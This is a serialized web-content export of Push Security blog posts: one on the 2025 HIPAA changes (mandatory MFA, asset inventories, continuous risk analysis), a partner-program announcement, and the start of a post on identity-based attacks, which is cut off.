data":116560},[],{},{"nodeType":178,"data":116562,"content":116563},{},[116564],{"nodeType":173,"value":104880,"marks":116565,"data":116567},[116566],{"type":370},{},{"nodeType":312,"data":116569,"content":116572},{"target":116570},{"sys":116571},{"id":104888,"type":317,"linkType":318},[],{"nodeType":178,"data":116574,"content":116575},{},[116576],{"nodeType":173,"value":104894,"marks":116577,"data":116578},[],{},{"nodeType":178,"data":116580,"content":116581},{},[116582],{"nodeType":173,"value":104901,"marks":116583,"data":116584},[],{},{"nodeType":312,"data":116586,"content":116589},{"target":116587},{"sys":116588},{"id":98287,"type":317,"linkType":318},[],{"nodeType":235,"data":116591,"content":116592},{},[116593],{"nodeType":173,"value":104913,"marks":116594,"data":116595},[],{},{"nodeType":178,"data":116597,"content":116598},{},[116599],{"nodeType":173,"value":104920,"marks":116600,"data":116602},[116601],{"type":370},{},{"nodeType":178,"data":116604,"content":116605},{},[116606],{"nodeType":173,"value":104928,"marks":116607,"data":116608},[],{},{"nodeType":178,"data":116610,"content":116611},{},[116612],{"nodeType":173,"value":104935,"marks":116613,"data":116614},[],{},{"nodeType":235,"data":116616,"content":116617},{},[116618],{"nodeType":173,"value":104942,"marks":116619,"data":116620},[],{},{"nodeType":178,"data":116622,"content":116623},{},[116624,116628,116633],{"nodeType":173,"value":104949,"marks":116625,"data":116627},[116626],{"type":370},{},{"nodeType":173,"value":104954,"marks":116629,"data":116632},[116630,116631],{"type":194},{"type":370},{},{"nodeType":173,"value":104960,"marks":116634,"data":116636},[116635],{"type":370},{},{"nodeType":178,"data":116638,"content":116639},{},[116640,116643,116650],{"nodeType":173,"value":104968,"marks":116641,"data":116642},[],{},{"nodeType":186,"data":116644,"content":116645},{"uri":104973},[116646],{"nodeType":173,"value":21642,"marks":116647,"data":116649},[116648],{"type":194},{},{"nodeType":173,"value":1477,"marks":116651,"data":116652},[],{},{"nodeType":178,"data":116654,"content":116655},{},[116656],{"nodeType":173,"value":104986,"marks":116657,"data":116658},[],{},{"nodeType":178,"data":116660,"content":116661},{},[116662],{"nodeType":173,"value":104993,"marks":116663,"data":116664},[],{},{"nodeType":312,"data":116666,"content":116669},{"target":116667},{"sys":116668},{"id":105000,"type":317,"linkType":318},[],{"nodeType":235,"data":116671,"content":116672},{},[116673],{"nodeType":173,"value":105006,"marks":116674,"data":116675},[],{},{"nodeType":178,"data":116677,"content":116678},{},[116679],{"nodeType":173,"value":105013,"marks":116680,"data":116682},[116681],{"type":370},{},{"nodeType":178,"data":116684,"content":116685},{},[116686],{"nodeType":173,"value":105021,"marks":116687,"data":116688},[],{},{"nodeType":178,"data":116690,"content":116691},{},[116692],{"nodeType":173,"value":105028,"marks":116693,"data":116694},[],{},{"nodeType":312,"data":116696,"content":116699},{"target":116697},{"sys":116698},{"id":105035,"type":317,"linkType":318},[],{"nodeType":235,"data":116701,"content":116702},{},[116703],{"nodeType":173,"value":105041,"marks":116704,"data":116705},[],{},{"nodeType":178,"data":116707,"content":116708},{},[116709],{"nodeType":173,"value":105048,"marks":116710,"data":116712},[116711],{"type":370},{},{"nodeType":178,"data":116714,"content":116715},{},[116716],{"nodeType":173,"value":105056,"marks":116717,"data":116718},[],{},{"nodeType":178,"data":116720,"content":116721},{},[116722],{"nodeType":173,"value":105063,"marks":116723,"data":116724},[],{},{"nodeType":178,"data":116726,"content":116727},{},[116728],{"nodeType":173,"value":105070,"marks":116729,"data":116730},[],{},{"nodeType":312,"data":116732,"content":116735},{"target":116733},{"sys":116734},{"id":105077,"type":317,"linkType":318},[],{"nodeType":235,"data":116737,"content":116738},{},[116739],{"nodeType":173,"value":105083,"marks":116740,"data":116741},[],{},{"nodeType":178,"data":116743,"content":116744},{},[116745],{"nodeType":173,"value":105090,"marks":116746,"data":116748},[116747],{"type":370},{},{"nodeType":178,"data":116750,"content":116751},{},[116752],{"nodeType":173,"value":105098,"marks":116753,"data":116754},[],{},{"nodeType":178,"data":116756,"content":116757},{},[116758,116761,116768],{"nodeType":173,"value":105105,"marks":116759,"data":116760},[],{},{"nodeType":186,"data":116762,"content":116763},{"uri":4342},[116764],{"nodeType":173,"value":835,"marks":116765,"data":116767},[116766],{"type":194},{},{"nodeType":173,"value":105116,"marks":116769,"data":116770},[],{},{"nodeType":312,"data":116772,"content":116775},{"target":116773},{"sys":116774},{"id":105123,"type":317,"linkType":318},[],{"nodeType":235,"data":116777,"content":116778},{},[116779],{"nodeType":173,"value":105129,"marks":116780,"data":116781},[],{},{"nodeType":178,"data":116783,"content":116784},{},[116785,116788,116796],{"nodeType":173,"value":101248,"marks":116786,"data":116787},[],{},{"nodeType":186,"data":116789,"content":116790},{"uri":9152},[116791],{"nodeType":173,"value":101255,"marks":116792,"data":116795},[116793,116794],{"type":194},{"type":370},{},{"nodeType":173,"value":101261,"marks":116797,"data":116798},[],{},{"nodeType":312,"data":116800,"content":116803},{"target":116801},{"sys":116802},{"id":9179,"type":317,"linkType":318},[],{"nodeType":178,"data":116805,"content":116806},{},[116807],{"nodeType":173,"value":101273,"marks":116808,"data":116809},[],{},{"nodeType":178,"data":116811,"content":116812},{},[116813,116816,116823],{"nodeType":173,"value":101289,"marks":116814,"data":116815},[],{},{"nodeType":186,"data":116817,"content":116818},{"uri":101294},[116819],{"nodeType":173,"value":101297,"marks":116820,"data":116822},[116821],{"type":194},{},{"nodeType":173,"value":101302,"marks":116824,"data":116825},[],{},{"nodeType":312,"data":116827,"content":116830},{"target":116828},{"sys":116829},{"id":101326,"type":317,"linkType":318},[],{"nodeType":231,"data":116832,"content":116833},{},[],{"nodeType":169,"data":116835,"content":116836},{},[116837],{"nodeType":173,"value":18605,"marks":116838,"data":116840},[116839],{"type":370},{},{"nodeType":178,"data":116842,"content":116843},{},[116844],{"nodeType":173,"value":98309,"marks":116845,"data":116846},[],{},{"nodeType":178,"data":116848,"content":116849},{},[116850,116853,116859],{"nodeType":173,"value":61741,"marks":116851,"data":116852},[],{},{"nodeType":186,"data":116854,"content":116855},{"uri":98320},[116856],{"nodeType":173,"value":1472,"marks":116857,"data":116858},[],{},{"nodeType":173,"value":1477,"marks":116860,"data":116861},[],{},{"items":116863},[116864,116866],{"sys":116865,"name":505},{"id":504},{"sys":116867,"name":509},{"id":508},{"items":116869},[116870],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":116871},{"url":1496},{"items":116873},[116874],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":116875},{"url":25597},{"json":116877,"links":117186},{"data":116878,"content":116879,"nodeType":165},{},[116880,116895,116902,116909,116912,116920,116935,116954,116961,116981,117001,117007,117010,117018,117025,117032,117052,117058,117061,117069,117076,117083,117103,117123,117129,117135,117138,117146,117153,117160,117167],{"data":116881,"content":116882,"nodeType":178},{},[116883,116887,116891],{"data":116884,"marks":116885,"value":116886,"nodeType":173},{},[],"If you work in healthcare, or support teams that do, you already know that regulatory change can be both necessary ",{"data":116888,"marks":116889,"value":4892,"nodeType":173},{},[116890],{"type":1646},{"data":116892,"marks":116893,"value":116894,"nodeType":173},{},[]," disruptive. The updates bring welcome clarity and stronger security expectations, but they also ask a lot from security teams that are already stretched thin.",{"data":116896,"content":116897,"nodeType":178},{},[116898],{"data":116899,"marks":116900,"value":116901,"nodeType":173},{},[],"Here at Push, we think these changes are a step in the right direction. Better protection for patient data is always the goal. But implementing these new requirements isn’t easy, especially in complex environments with a mix of legacy systems, shadow SaaS, and a hybrid workforce.",{"data":116903,"content":116904,"nodeType":178},{},[116905],{"data":116906,"marks":116907,"value":116908,"nodeType":173},{},[],"So, let’s walk through a few of the biggest changes coming in 2025, why they matter, and how healthcare orgs can begin navigating them effectively.",{"data":116910,"content":116911,"nodeType":231},{},[],{"data":116913,"content":116914,"nodeType":169},{},[116915],{"data":116916,"marks":116917,"value":116919,"nodeType":173},{},[116918],{"type":370},"MFA is no longer optional",{"data":116921,"content":116922,"nodeType":178},{},[116923,116927,116932],{"data":116924,"marks":116925,"value":116926,"nodeType":173},{},[],"In the past, HIPAA called multi-factor authentication an \"addressable\" control. That gave organizations some wiggle room to implement it where feasible. The 2025 update removes the ambiguity. If your systems handle electronic protected health information, MFA is now ",{"data":116928,"marks":116929,"value":116931,"nodeType":173},{},[116930],{"type":1646},"mandatory",{"data":116933,"marks":116934,"value":1477,"nodeType":173},{},[],{"data":116936,"content":116937,"nodeType":178},{},[116938,116942,116950],{"data":116939,"marks":116940,"value":116941,"nodeType":173},{},[],"This is a good move. Passwords alone just don’t cut it anymore, especially with the rise of credential stuffing, ",{"data":116943,"content":116944,"nodeType":186},{"uri":92943},[116945],{"data":116946,"marks":116947,"value":116949,"nodeType":173},{},[116948],{"type":194},"sophisticated phishing attacks",{"data":116951,"marks":116952,"value":116953,"nodeType":173},{},[],", and social engineering. But rolling out MFA across every user? That’s a big lift.",{"data":116955,"content":116956,"nodeType":178},{},[116957],{"data":116958,"marks":116959,"value":116960,"nodeType":173},{},[],"What we often see teams struggle with is coverage. Ensuring MFA is enforced on all apps in your environment is often pretty tough, but starting with a thorough review of application access across the organization is a good first step. Once you have that visibility, you can better assess where gaps in MFA enforcement might exist and then start closing them.",{"data":116962,"content":116963,"nodeType":178},{},[116964,116968,116977],{"data":116965,"marks":116966,"value":116967,"nodeType":173},{},[],"And those gaps are more common than many teams realize. The average employee ",{"data":116969,"content":116971,"nodeType":186},{"uri":116970},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have/#id-identity-configurations-and-how-they-can-be-exploited",[116972],{"data":116973,"marks":116974,"value":116976,"nodeType":173},{},[116975],{"type":194},"uses 15 different work applications",{"data":116978,"marks":116979,"value":116980,"nodeType":173},{},[],", yet only 28% of those apps have MFA enabled. Even more worrying, nearly half of those apps missing MFA protection are also using weak or leaked passwords, compounding the risk. ",{"data":116982,"content":116983,"nodeType":178},{},[116984,116988,116997],{"data":116985,"marks":116986,"value":116987,"nodeType":173},{},[],"While this shift will take planning, the good news is that there are tools that can help make it more manageable. Our ",{"data":116989,"content":116991,"nodeType":186},{"uri":116990},"https://pushsecurity.com/product/",[116992],{"data":116993,"marks":116994,"value":116996,"nodeType":173},{},[116995],{"type":194},"browser-based agent",{"data":116998,"marks":116999,"value":117000,"nodeType":173},{},[]," gives you a way to monitor login activity across your workforce, surfacing when users aren't registered for MFA on apps they regularly use for work. We can even enforce MFA on those accounts, prompting users to set up MFA using a customizable in-browser banner, which helps teams get better coverage without needing to chase down every individual. This is all done where the users are actually logging into their accounts in the browser. No integrations required.",{"data":117002,"content":117006,"nodeType":312},{"target":117003},{"sys":117004},{"id":117005,"type":317,"linkType":318},"6VMovx9xzsokZGQQryKlyA",[],{"data":117008,"content":117009,"nodeType":231},{},[],{"data":117011,"content":117012,"nodeType":169},{},[117013],{"data":117014,"marks":117015,"value":117017,"nodeType":173},{},[117016],{"type":370},"Know your assets and your data flows",{"data":117019,"content":117020,"nodeType":178},{},[117021],{"data":117022,"marks":117023,"value":117024,"nodeType":173},{},[],"One of the more technical (but important!) updates in the 2025 rule is the new requirement to maintain a detailed inventory of all systems that interact with electronic protected health information. This includes not just physical devices and on-prem systems, but cloud services and software as well. The goal is to understand exactly which systems interact with ePHI, how they do it, and where that data goes.",{"data":117026,"content":117027,"nodeType":178},{},[117028],{"data":117029,"marks":117030,"value":117031,"nodeType":173},{},[],"Importantly, this new guidance also requires orgs to remove extraneous software from any systems that handle ePHI. That could mean eliminating unused or redundant apps, retiring legacy systems that no longer meet security standards, or re-evaluating the use of consumer-grade tools for sensitive workflows.",{"data":117033,"content":117034,"nodeType":178},{},[117035,117039,117048],{"data":117036,"marks":117037,"value":117038,"nodeType":173},{},[],"Getting a complete view of your assets is easier said than done, especially when staff are able to ",{"data":117040,"content":117042,"nodeType":186},{"uri":117041},"https://pushsecurity.com/uc/shadow-saas",[117043],{"data":117044,"marks":117045,"value":117047,"nodeType":173},{},[117046],{"type":194},"self-adopt",{"data":117049,"marks":117050,"value":117051,"nodeType":173},{},[]," new tools to increase their productivity. Push tracks the apps your users log into with their work credentials, no matter if those apps are officially sanctioned or not. This helps you uncover your true application footprint, so you can begin reviewing which SaaS apps are essential and which ones pose unnecessary risk and should be blocked. With better visibility into real-world usage, it becomes much easier to decide which tools are worth keeping.",{"data":117053,"content":117057,"nodeType":312},{"target":117054},{"sys":117055},{"id":117056,"type":317,"linkType":318},"664FI99rvxtjfb2b6KcJqv",[],{"data":117059,"content":117060,"nodeType":231},{},[],{"data":117062,"content":117063,"nodeType":169},{},[117064],{"data":117065,"marks":117066,"value":117068,"nodeType":173},{},[117067],{"type":370},"Risk analysis needs to get real",{"data":117070,"content":117071,"nodeType":178},{},[117072],{"data":117073,"marks":117074,"value":117075,"nodeType":173},{},[],"The new HIPAA rule puts more emphasis on risk analysis. One-off assessments are no longer sufficient. Organizations need to demonstrate an ongoing process for identifying and evaluating threats and vulnerabilities.",{"data":117077,"content":117078,"nodeType":178},{},[117079],{"data":117080,"marks":117081,"value":117082,"nodeType":173},{},[],"Again, easier said than done. Risk isn’t static, and security teams can’t catch everything with quarterly audits alone. That’s why a lot of orgs are looking for ways to layer in continuous, real-time signals that can flag risk before it becomes a full-blown incident.",{"data":117084,"content":117085,"nodeType":178},{},[117086,117090,117099],{"data":117087,"marks":117088,"value":117089,"nodeType":173},{},[],"Behavioral signals are one way to make that process more dynamic. These give you a better view of how users interact with systems and where potential gaps might be forming. ",{"data":117091,"content":117093,"nodeType":186},{"uri":117092},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have",[117094],{"data":117095,"marks":117096,"value":117098,"nodeType":173},{},[117097],{"type":194},"In our own research",{"data":117100,"marks":117101,"value":117102,"nodeType":173},{},[],", we found that one in four IdP accounts still lack MFA. When you combine that with weak credentials and unknown app usage, you get a clearer picture of how vulnerabilities build up over time. ",{"data":117104,"content":117105,"nodeType":178},{},[117106,117110,117119],{"data":117107,"marks":117108,"value":117109,"nodeType":173},{},[],"Push supports that kind of ongoing risk work by providing real-time insights into user behavior. We surface unusual activity such as ",{"data":117111,"content":117113,"nodeType":186},{"uri":117112},"https://pushsecurity.com/uc/identity-security-posture-management",[117114],{"data":117115,"marks":117116,"value":117118,"nodeType":173},{},[117117],{"type":194},"unusual login methods",{"data":117120,"marks":117121,"value":117122,"nodeType":173},{},[]," or atypical app usage. These kinds of insights can help teams prioritize where attention is needed most. Even simple changes that follow from those insights, like tightening authentication policies or auditing admin access more regularly, can have a meaningful impact on your risk posture.",{"data":117124,"content":117128,"nodeType":312},{"target":117125},{"sys":117126},{"id":117127,"type":317,"linkType":318},"U9FszA4eUM4zVYSkakmNY",[],{"data":117130,"content":117134,"nodeType":312},{"target":117131},{"sys":117132},{"id":117133,"type":317,"linkType":318},"2F5yEv6vkdEs0Q8FYbp6uv",[],{"data":117136,"content":117137,"nodeType":231},{},[],{"data":117139,"content":117140,"nodeType":169},{},[117141],{"data":117142,"marks":117143,"value":117145,"nodeType":173},{},[117144],{"type":370},"Wrapping up",{"data":117147,"content":117148,"nodeType":178},{},[117149],{"data":117150,"marks":117151,"value":117152,"nodeType":173},{},[],"The 2025 HIPAA changes are thoughtful and necessary. They reflect the way people actually work today, and they challenge us to raise the bar on how we manage access, visibility, and risk. ",{"data":117154,"content":117155,"nodeType":178},{},[117156],{"data":117157,"marks":117158,"value":117159,"nodeType":173},{},[],"Of course, none of this is easy. It takes time to build out inventories, map data flows, and rethink risk management practices. But the end result, a more secure and resilient environment for patient data, is well worth it.",{"data":117161,"content":117162,"nodeType":178},{},[117163],{"data":117164,"marks":117165,"value":117166,"nodeType":173},{},[],"At Push, our goal is to make that process more manageable. We build tools to help organizations get clarity on their SaaS usage, strengthen their identity security posture, and respond to threats quickly. But more than that, we want to be a resource to teams navigating these updates.",{"data":117168,"content":117169,"nodeType":178},{},[117170,117174,117182],{"data":117171,"marks":117172,"value":117173,"nodeType":173},{},[],"Whether you're just starting to assess your readiness or knee-deep in implementation plans, ",{"data":117175,"content":117176,"nodeType":186},{"uri":473},[117177],{"data":117178,"marks":117179,"value":117181,"nodeType":173},{},[117180],{"type":194},"let us know",{"data":117183,"marks":117184,"value":117185,"nodeType":173},{},[],". We’re always happy to chat.",{"entries":117187},{"hyperlink":117188,"inline":117189,"block":117190},[],[],[117191,117197,117203,117211],{"sys":117192,"__typename":5345,"title":117193,"caption":117194,"layoutMode":118,"file":117195},{"id":117005},"MFA banner image","Push prompts users to enroll MFA when logging into an app if no MFA method has been detected. ",{"url":117196,"width":23880,"height":113559},"https://images.ctfassets.net/y1cdw1ablpvd/1ozt4EP9Y79qYo2uH0BEjJ/5cee60a130feeca5e1ea262e6252d243/image2.png",{"sys":117198,"__typename":5345,"title":117199,"caption":117200,"layoutMode":118,"file":117201},{"id":117056},"Push dashboard image","Push gives you a complete view of your assets and how employees are accessing them — enabling you to monitor where data is being stored, and how secure the access methods are.",{"url":117202,"width":5358,"height":89477},"https://images.ctfassets.net/y1cdw1ablpvd/7sZsfo4pw2T0iTpfrLL29e/4674a5836647b0c55a05e321ac665092/image3.png",{"sys":117204,"__typename":5345,"title":117205,"caption":117206,"layoutMode":118,"file":117207},{"id":117127},"Push identity inventory","Push provides a complete picture of your identity security posture, identifying and prioritising risks for remediation.  ",{"url":117208,"width":117209,"height":117210},"https://images.ctfassets.net/y1cdw1ablpvd/5WSEzq2fwOoYI4gSu5L5er/7e14ad9b56fb63806af5a5fa66f3c247/image1.png",1418,1318,{"sys":117212,"__typename":15269,"type":15270,"ctaText":117213,"buttonLabel":64975,"buttonColour":15273,"buttonUrl":102966},{"id":117133},"Learn how threat actors like Scattered Spider are exploiting identity security gaps to take over accounts, steal data, and deploy ransomware. ","content:blog:2025-hipaa-rule-change.json","blog/2025-hipaa-rule-change.json","blog/2025-hipaa-rule-change",{"_path":117218,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":117219,"ogImage":118,"summary":117222,"title":117233,"subtitle":117234,"metaTitle":117233,"synopsis":117232,"hashTags":118,"publishedDate":117235,"slug":117236,"tagsCollection":117237,"content":117243,"relatedBlogPostsCollection":117502,"authorsCollection":118114,"_id":118122,"_type":5439,"_source":5440,"_file":118123,"_stem":118124,"_extension":5439},"/blog/introducing-the-push-security-advisor-network-psan",{"id":117220,"publishedAt":117221},"1B9Rni05rjeDYEskxyP8Oc","2025-10-22T13:03:49.138Z",{"json":117223},{"data":117224,"content":117225,"nodeType":165},{},[117226],{"data":117227,"content":117228,"nodeType":178},{},[117229],{"data":117230,"marks":117231,"value":117232,"nodeType":173},{},[],"Introducing a new era of partner-first phishing protection and identity security.","Introducing the Push Security Advisor Network (PSAN)","A New Era of Partner-First Phishing Protection and Identity Security","2025-05-20T00:00:00.000Z","introducing-the-push-security-advisor-network-psan",{"items":117238},[117239],{"sys":117240,"name":117242},{"id":117241},"4EtskIWlj3SOH3UHbFR8uG","Company news",{"json":117244,"links":117494},{"data":117245,"content":117246,"nodeType":165},{},[117247,117262,117269,117272,117280,117287,117294,117302,117324,117327,117335,117342,117405,117424,117427,117435,117442,117482,117488],{"data":117248,"content":117249,"nodeType":178},{},[117250,117254,117259],{"data":117251,"marks":117252,"value":117253,"nodeType":173},{},[],"At Push Security, our mission has always been to empower security teams to defend against today’s most persistent threats—namely, identity attacks such as phishing, credential-based attacks, session hijacking, and account takeover. Today, we’re thrilled to take that mission one step further with the launch of our new global partner program: the ",{"data":117255,"marks":117256,"value":117258,"nodeType":173},{},[117257],{"type":370},"Push Security Advisor Network (PSAN)",{"data":117260,"marks":117261,"value":1477,"nodeType":173},{},[],{"data":117263,"content":117264,"nodeType":178},{},[117265],{"data":117266,"marks":117267,"value":117268,"nodeType":173},{},[],"Designed for cybersecurity solution providers and technology alliance partners, PSAN is more than just a channel program—it’s a community built for collaboration, growth, and stronger security outcomes for organizations navigating the risks of SaaS and cloud adoption.",{"data":117270,"content":117271,"nodeType":231},{},[],{"data":117273,"content":117274,"nodeType":169},{},[117275],{"data":117276,"marks":117277,"value":117279,"nodeType":173},{},[117278],{"type":370},"Why PSAN, Why Now?",{"data":117281,"content":117282,"nodeType":178},{},[117283],{"data":117284,"marks":117285,"value":117286,"nodeType":173},{},[],"Identity has become the new perimeter. With the explosion of SaaS tools and hybrid work, attackers are finding ways to bypass traditional security controls by targeting identities—using advanced phishing attacks, infostealers, and compromised credentials to access the cloud applications and services that are now the core of business IT. ",{"data":117288,"content":117289,"nodeType":178},{},[117290],{"data":117291,"marks":117292,"value":117293,"nodeType":173},{},[],"Security teams need better visibility and control over how employees interact with cloud services, and they need trusted partners to help deliver it.",{"data":117295,"content":117296,"nodeType":178},{},[117297],{"data":117298,"marks":117299,"value":117301,"nodeType":173},{},[117300],{"type":370},"That’s where PSAN comes in.",{"data":117303,"content":117304,"nodeType":3769},{},[117305,117313],{"data":117306,"content":117307,"nodeType":178},{},[117308],{"data":117309,"marks":117310,"value":117312,"nodeType":173},{},[117311],{"type":1646},"Security teams need an answer to today’s sophisticated phishing and identity attacks. With PSAN, we’re bringing together top-tier partners to help businesses proactively address identity-based threats, reduce risk, and strengthen their security posture.",{"data":117314,"content":117315,"nodeType":178},{},[117316,117321],{"data":117317,"marks":117318,"value":117320,"nodeType":173},{},[117319],{"type":370},"Bryan Wallace, Vice President of Global Partnerships at Push Security",{"data":117322,"marks":117323,"value":2340,"nodeType":173},{},[],{"data":117325,"content":117326,"nodeType":231},{},[],{"data":117328,"content":117329,"nodeType":169},{},[117330],{"data":117331,"marks":117332,"value":117334,"nodeType":173},{},[117333],{"type":370},"What Partners Can Expect",{"data":117336,"content":117337,"nodeType":178},{},[117338],{"data":117339,"marks":117340,"value":117341,"nodeType":173},{},[],"PSAN is purpose-built to make our partners successful—technically, operationally, and financially. Members of the Push Security Advisor Network gain access to:",{"data":117343,"content":117344,"nodeType":250},{},[117345,117360,117375,117390],{"data":117346,"content":117347,"nodeType":254},{},[117348],{"data":117349,"content":117350,"nodeType":178},{},[117351,117356],{"data":117352,"marks":117353,"value":117355,"nodeType":173},{},[117354],{"type":370},"Technical Enablement & Training\n",{"data":117357,"marks":117358,"value":117359,"nodeType":173},{},[]," Get hands-on certifications and deep technical guidance to become a trusted Push Security expert.",{"data":117361,"content":117362,"nodeType":254},{},[117363],{"data":117364,"content":117365,"nodeType":178},{},[117366,117371],{"data":117367,"marks":117368,"value":117370,"nodeType":173},{},[117369],{"type":370},"Sales & Marketing Support\n",{"data":117372,"marks":117373,"value":117374,"nodeType":173},{},[]," Leverage co-marketing campaigns, sales tools, and dedicated resources to accelerate your go-to-market efforts.",{"data":117376,"content":117377,"nodeType":254},{},[117378],{"data":117379,"content":117380,"nodeType":178},{},[117381,117386],{"data":117382,"marks":117383,"value":117385,"nodeType":173},{},[117384],{"type":370},"Exclusive Partner Incentives\n",{"data":117387,"marks":117388,"value":117389,"nodeType":173},{},[]," Enjoy industry-best margins, deal registration benefits, and performance-based rewards designed to maximize profitability.",{"data":117391,"content":117392,"nodeType":254},{},[117393],{"data":117394,"content":117395,"nodeType":178},{},[117396,117401],{"data":117397,"marks":117398,"value":117400,"nodeType":173},{},[117399],{"type":370},"Collaborative Threat Intelligence\n",{"data":117402,"marks":117403,"value":117404,"nodeType":173},{},[]," Stay ahead of attackers with access to real-time insights and identity-focused threat data curated by our experts.",{"data":117406,"content":117407,"nodeType":3769},{},[117408,117416],{"data":117409,"content":117410,"nodeType":178},{},[117411],{"data":117412,"marks":117413,"value":117415,"nodeType":173},{},[117414],{"type":1646},"With the launch of PSAN, we're empowering partners to deliver stronger, more scalable human-layer security solutions to customers around the world. PSAN reflects our commitment to a partner-first, partner-only growth strategy and to helping organizations reduce risk where it matters most—at the user level.",{"data":117417,"content":117418,"nodeType":178},{},[117419],{"data":117420,"marks":117421,"value":117423,"nodeType":173},{},[117422],{"type":370},"Kevin Arsenault, CRO at Push Security",{"data":117425,"content":117426,"nodeType":231},{},[],{"data":117428,"content":117429,"nodeType":169},{},[117430],{"data":117431,"marks":117432,"value":117434,"nodeType":173},{},[117433],{"type":370},"Let’s Grow Together",{"data":117436,"content":117437,"nodeType":178},{},[117438],{"data":117439,"marks":117440,"value":117441,"nodeType":173},{},[],"At Push, we believe that great partnerships are built on trust, enablement, and shared outcomes. PSAN is your opportunity to differentiate your security offerings, expand your business, and join a growing network of experts redefining what identity security looks like in a SaaS-first world.",{"data":117443,"content":117444,"nodeType":178},{},[117445,117449,117454,117457,117466,117470,117478],{"data":117446,"marks":117447,"value":117448,"nodeType":173},{},[],"🔗 ",{"data":117450,"marks":117451,"value":117453,"nodeType":173},{},[117452],{"type":370},"Ready to become a PSAN partner?",{"data":117455,"marks":117456,"value":3107,"nodeType":173},{},[],{"data":117458,"content":117460,"nodeType":186},{"uri":117459},"https://pushsecurity.com/partner",[117461],{"data":117462,"marks":117463,"value":117465,"nodeType":173},{},[117464],{"type":194},"Apply here",{"data":117467,"marks":117468,"value":117469,"nodeType":173},{},[],". Or join our ",{"data":117471,"content":117473,"nodeType":186},{"uri":117472},"https://pushsecurity.com/webinar/partner",[117474],{"data":117475,"marks":117476,"value":117477,"nodeType":173},{},[],"upcoming webinar on June 11",{"data":117479,"marks":117480,"value":117481,"nodeType":173},{},[]," to learn more.",{"data":117483,"content":117487,"nodeType":312},{"target":117484},{"sys":117485},{"id":117486,"type":317,"linkType":318},"snpEY0SZoTAy3JG1GiZsj",[],{"data":117489,"content":117490,"nodeType":178},{},[117491],{"data":117492,"marks":117493,"value":37,"nodeType":173},{},[],{"entries":117495},{"hyperlink":117496,"inline":117497,"block":117498},[],[],[117499],{"sys":117500,"__typename":15269,"type":15270,"ctaText":117501,"buttonLabel":15277,"buttonColour":72847,"buttonUrl":117472},{"id":117486},"Learn about the Push Security Advisor Network and hear our experts discuss the evolution of phishing threats in our upcoming virtual event.",{"items":117503},[117504,117941],{"__typename":1528,"sys":117505,"content":117507,"title":117925,"synopsis":117926,"hashTags":118,"publishedDate":117927,"slug":117928,"tagsCollection":117929,"authorsCollection":117933},{"id":117506},"4SvRrpqC8WswOmKbgr2RMM",{"json":117508},{"data":117509,"content":117510,"nodeType":165},{},[117511,117517,117524,117531,117551,117554,117561,117568,117591,117598,117605,117612,117615,117622,117629,117636,117643,117650,117657,117663,117666,117673,117680,117687,117694,117697,117704,117711,117718,117725,117728,117735,117785,117828,117835,117838,117845,117852,117859,117895,117913,117919],{"data":117512,"content":117516,"nodeType":312},{"target":117513},{"sys":117514},{"id":117515,"type":317,"linkType":318},"5Q1ArknoDbg1ubMHy7rBFH",[],{"data":117518,"content":117519,"nodeType":178},{},[117520],{"data":117521,"marks":117522,"value":117523,"nodeType":173},{},[],"Push was born out of a simple but urgent realization: Identity has become the new battleground in cybersecurity. ",{"data":117525,"content":117526,"nodeType":178},{},[117527],{"data":117528,"marks":117529,"value":117530,"nodeType":173},{},[],"As attackers take advantage of the massive changes to enterprise IT and working practices spurred on by the pandemic, we’re seeing the limitations of conventional controls exposed. And as attackers realize this, they’re doubling down on identity exploitation.",{"data":117532,"content":117533,"nodeType":178},{},[117534,117538,117547],{"data":117535,"marks":117536,"value":117537,"nodeType":173},{},[],"That urgency only intensified following the ",{"data":117539,"content":117540,"nodeType":186},{"uri":819},[117541],{"data":117542,"marks":117543,"value":117546,"nodeType":173},{},[117544,117545],{"type":194},{"type":370},"Snowflake breach in the summer of 2024",{"data":117548,"marks":117549,"value":117550,"nodeType":173},{},[],", which put the spotlight on how vulnerable internet-facing identities really are. For many security teams, it was a wake-up call — while for attackers, it was a feeding frenzy. ",{"data":117552,"content":117553,"nodeType":231},{},[],{"data":117555,"content":117556,"nodeType":169},{},[117557],{"data":117558,"marks":117559,"value":117560,"nodeType":173},{},[],"Attackers aren’t hacking in, they’re logging in  ",{"data":117562,"content":117563,"nodeType":178},{},[117564],{"data":117565,"marks":117566,"value":117567,"nodeType":173},{},[],"Identity is the new route of least resistance for attackers. They have developed TTPs to bypass traditional controls, evade detection and execute attacks faster than defenders can respond:",{"data":117569,"content":117570,"nodeType":250},{},[117571,117581],{"data":117572,"content":117573,"nodeType":254},{},[117574],{"data":117575,"content":117576,"nodeType":178},{},[117577],{"data":117578,"marks":117579,"value":117580,"nodeType":173},{},[],"Phishing attacks are reliably bypassing preventative controls like MFA, and predominantly email- and network-based detection tools.",{"data":117582,"content":117583,"nodeType":254},{},[117584],{"data":117585,"content":117586,"nodeType":178},{},[117587],{"data":117588,"marks":117589,"value":117590,"nodeType":173},{},[],"Attackers are leveraging compromised credentials at scale to take over accounts on business apps over the internet, fed by (and feeding) a vicious cycle of data breaches.",{"data":117592,"content":117593,"nodeType":178},{},[117594],{"data":117595,"marks":117596,"value":117597,"nodeType":173},{},[],"These attacks aren’t new. Things like phishing are amongst the oldest tricks in the book. But people are waking up to how sophisticated these attacks are becoming — and how much the change in business IT has undermined and exposed traditional controls.  ",{"data":117599,"content":117600,"nodeType":178},{},[117601],{"data":117602,"marks":117603,"value":117604,"nodeType":173},{},[],"It’s not surprising that attackers are shifting their focus away from the well-defended endpoint and network environments they’ve focused on in the last decade or so to take advantage. ",{"data":117606,"content":117607,"nodeType":178},{},[117608],{"data":117609,"marks":117610,"value":117611,"nodeType":173},{},[],"This is the problem my co-founders and I resolved to solve when we started this crazy journey. We’d been on the frontline of this threat evolution throughout our careers, first as ethical hackers tasked with breaking into the most secure companies in the world, and then turning these skills to keeping the bad guys out. We were convinced that this was the way the wind was blowing (even if most of our peers didn’t quite believe us yet!). ",{"data":117613,"content":117614,"nodeType":231},{},[],{"data":117616,"content":117617,"nodeType":169},{},[117618],{"data":117619,"marks":117620,"value":117621,"nodeType":173},{},[],"Modern problems require modern solutions",{"data":117623,"content":117624,"nodeType":178},{},[117625],{"data":117626,"marks":117627,"value":117628,"nodeType":173},{},[],"If identity is the new perimeter, then 